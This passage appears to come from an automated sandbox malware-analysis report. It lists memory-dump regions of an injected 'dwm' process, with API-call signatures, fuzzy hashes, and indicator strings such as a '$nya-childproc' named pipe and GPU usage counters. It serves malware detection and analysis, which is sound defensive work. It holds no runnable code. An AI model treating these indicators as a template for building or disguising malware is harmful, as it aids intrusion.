                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 4d273957cce40b14b81512b212960d0c5ac69eb77c03bf3582a26a423fa22559
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: E2515A32210B94DAE761CF62E85C39A77B1F788F99F844124DE4A47B98DF3DC0498B01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 85af7c0df6d96ff56793c513c846f53bbe21566487b804fef60e96e1e86c56aa
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 1E511672210B98DAE725CF62E84C35AB7B5F789F98F844124DE4917B68EF3DC0498B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 7a4b9934c39954434b1bed372665b8cad1b52a957d3a02baf700525a140d350d
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 40518B31705F64D2FA199B56A80C3A922B0AB49FB0FD807259E3D47BD8EF3AD4498740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 818ea9e5dd1d903799723881392a824daa059856c04b34a5f3159795b7fd6ab2
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: DB31DF36A04E60D6E722CF52A81C399A7B0F788BC5F840534DE4983EE5DF39C45A8741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: e201dc5a76edf7af057087f8435fc5362f830a304ae305911e779908e8925d15
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 19319A36A00E64EAF721CF12A84C759A3B0F788F95FC54625DE4957E28EF3DC45A8740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 2e2f9f89027a32d9da8d4dac6d4efbe50fd2faeaa6770bac27176f6d1014dbee
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: E831BF31A10F65CAE751DF26A8AC75963F0B784F85F845034DE8A83BA4DF39C449CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 674d6d720af4566d9f90aa9011e063bbd8d2adb1117406ba20fd6cb004da0350
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 6B313931610F65DAFB50DF22A88C759B3B1F789F94F8441259E4A53B78EE3AD4498B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 3011e366b99087b3ad4c97fa2f5798e4d10311efc7662d3079cbf8b784a87d51
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: F2D18E32604FA0CAEB22DB65946D39D77B0F799B88F900125EA8957FD5CB35C489CB02
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: 2e8a0e5b5e82ce01629f168f628000d8c7409aab03160c131e47597a4f9aa8e4
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: 2CD17A72604BA0CAEB60DF65949C3AD77F0F785788F940215EE8957F9ADB3AC099C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: ed68b2b49a46152e751ac607c1fda94ffa2761773422a559bba34cd9e68d9826
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: 61D17A33604FA0CAEB28DB65945C39D77B0F785B88F900215EA8957F9ADB36D589CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 221bf94359fd7e7b1e28a2d40d6110b21edc986eb1a18df4c85078b62c1ace4e
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 0D419F73214F84CAE761CF61E45839A77B1F388B88F848129DB8947B98DF39D449CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: d0f75600af824dca34da54e32df4f6236ae98fe8b60280119b9a1718f013f19a
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 45417B32214F94DAE764CF21E44839A77B5F389B98F848229DA8907B5CDF3DC489CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 87974e93325af33150f708034e4ca2ca179f1c7030491a6afd5d027639728c69
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 93113432618B60C2E710CB21F45C35A7770F389BA4F940225EA9A42EE9DF3EC148CF42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: e0a6551b3a49e7bdcdd879917064d0077e5fa16422dcff55c9419180316aa286
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: E7112636618A64C2F710CB61F41C35A6770F389BA4F944215EA9A12EA8CF3EC148CF40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 5f3ad5a14ba210a8664d9c5c138e7134c0bed5c9a3e30d19fa11e962ab184ee8
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 7381C431A00F60C6FA569F67987D3A966B0BB85B84FC440359A0887FD6DB3BC94D8703
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 954f551f73277cc29f068abb0c777f6cfa6a27ac45816fa04d8c83b98ceb3d44
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 5081D430E01E71C6FB55EB65984D39962F1AB86780FC44025AE4847FF6DA3BC86EC710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 4e1155df835efa0719f4472f38cc64617c0eaa2406ef8cd2b946ac3c9351b30b
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 9D811831B00F75C6FB54AB66944D3A967B1AB85F84FC44118AA884BF9FDB3BC84D8700
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9B31
                                                  • GetLastError.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9B69
                                                  • FreeLibrary.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: 4b062c0a1edb3f0c0f3223a4027fa542cbb00628e4faf89c5560c2a8c96f6348
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 8D318F31212E64D5EF23DB06A82D7A523B4B745BA0FD906359D198AFD0DF3AC4588712
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09B31
                                                  • GetLastError.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09B69
                                                  • FreeLibrary.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: c134f5d95e5f3e3789fb47a7a575c44016183812e30985e25b5e373fb4f62483
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: C331BE31212E64D1FE19DB12A89C7A923B4BB49FB4FD90624ED1D47B98EF3AC4488700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
